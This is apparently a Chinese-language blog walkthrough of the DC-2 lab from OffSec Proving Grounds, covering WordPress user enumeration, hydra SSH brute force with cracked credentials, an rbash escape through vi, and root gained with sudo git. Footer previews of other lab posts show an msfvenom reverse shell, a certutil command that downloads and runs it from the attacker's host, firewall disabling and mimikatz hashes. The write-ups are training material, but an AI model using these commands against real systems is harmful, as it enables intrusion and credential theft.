Proving Grounds Play : DC-2 Walkthrough

-

 Proving Grounds Play : DC-2 Walkthrough


Foothold :

  • 80 網站是一個 WordPress,透過 wpscan 爬出使用者帳號
  • wordpress 網站告知你使用 cewl 去產生密碼檔
  • SSH 爆破出一名使用者的憑證,後續 SSH 登入但是是限制的 rbash
  • 使用 help 發現可以執行 vi,直接用 vi 編輯 local.txt 獲得第一階段的 flag

PE :

  • 參考 GTFO 發現 vi 可以跳脫 shell,依據方式輸入後成功跳脫
  • 跳脫後呼叫 /bin/bash,然後自行重新定義 PATH 並呼叫
  • 依據系統的 flag 提示成功切換使用者( 使用者的密碼透過 WordPress 爆破出來 )
  • sudo -l 發現 git 可以使用,參考 GTFO 標準利用後成功 root


第一步 Rustscan,└─$ rustscan -a 192.168.230.194 --scripts none --ulimit 5000 | tee rustscan



snmp check



nmap



whatweb



add DC-2 to hosts file and whatweb again --> WordPress 4.7.10



└─$ wpscan --url http://dc-2 -e vp --plugins-detection mixed --api-token <API_TOKEN>



wpscan check user,wpscan --url http://dc-2 --enumerate u

User List : admin、jerry、tom



編輯使用者名單與快速密碼破解檔嘗試 7744 SSH 暴力破解

└─$ hydra -L ./usernames.txt -P ./fasttrack.txt ssh://192.168.230.194 -s 7744 -V



Burp Suite and 快速密碼檔破解 wp-admin



gobuster



都破解不了,開網頁看看結果在 http://dc-2/index.php/flag/ 告訴你要用 cewl



做一個 cewl.txt 的檔案,看來僅有 165 筆



hydra 先測試 SSH,└─$ hydra -L ./usernames.txt -P ./cewl.txt ssh://192.168.230.194 -s 7744 -V

破解出 tom:parturient


SSH 進去了,但甚麼指令都沒有用,看得到 flag 但讀不了



使用了 -t "bash --noprofile" & -t "sh --noprofile" 都告知沒有 bash & sh 指令可以使用

那就先 help 看一下相關指令,看看甚麼可以查可以使用的指令



有 echo 那就使用 echo $PATH 看看載入哪個命令檔

發現是 /home/tom/usr/bin

接著 ls 看一下內容有提供那些指令



vi local.txt 得到第一段 flag




另外網頁的後半段很有意思



該路徑下有另外一個檔案是 flag3.txt,一樣 vi 看一下內容

可憐的 tom 老是追著 jerry 跑,也許他應該 su ......




測試了一番沒有 su 指令



後來在 GTFO 發現除了常用的 SUID、SUDO 等,在 vi 底下有個 shell

告訴我們可以透過 vi 產生互動式系統 shell 來突破受限環境



使用方式 (b),輸入 vi 後進入編輯畫面,然後輸入 :set shell=/bin/sh 再按 ENTER



接著輸入 :shell 再按 ENTER 後會跳回 command 介面


這時候就可以呼叫 /bin/bash

接著看一下現有的 $PATH,"echo $PATH" 是 /home/tom/usr/bin 有限制的 shell

直接重新定義 PATH

export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games"

然後載入 PATH,"echo $PATH"

測試原本不能用的 cat 這時候就可以用了,表示我們跳脫了原本限制的 shell

使用了自己定義的 shell



這時候再使用 su jerry (跟著 jerry 跑.....),輸入 whoami & id 確認現在已經成功切換到 jerry



PS : 使用 su jerry 的時候要輸入 jerry 的密碼,怎麼來的呢?

在密碼爆破的時候沒有查到 jerry 的密碼,原因是 jerry 不允許 ssh 登入所以查不到

但另外有透過 Wordpress 測試到 jerry:adipiscing 是有效的憑證

看來網頁上 Log in as one to see the next flag. If you can’t find it, log in as another.

那句話的意思有多層涵義



切換到 jerry 的 home 目錄,發現另外一個 flag4.txt 的檔案,內文顯示得有點機車如下

很高興看到你已經做到了這一步 - 但你還沒到家。

您仍然需要獲得最終標誌(唯一真正重要的標誌!!!)。

這裡沒有任何提示──你現在只能靠自己了。 :-)

繼續 - 離開這裡! !



開始 PE 吧,cat /etc/passwd,可以看到 tom 被限制的 rbash



cat /etc/crontab



sudo -l 可以使用 git



參考 GTFO,有好多種提權的方式



測試到第二種就成功 root

  • sudo git -p help config
!/bin/sh


輸入 sudo git -p help config 會進入到 git 的說明頁面,接著輸入 !/bin/sh 就成功 root 了




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容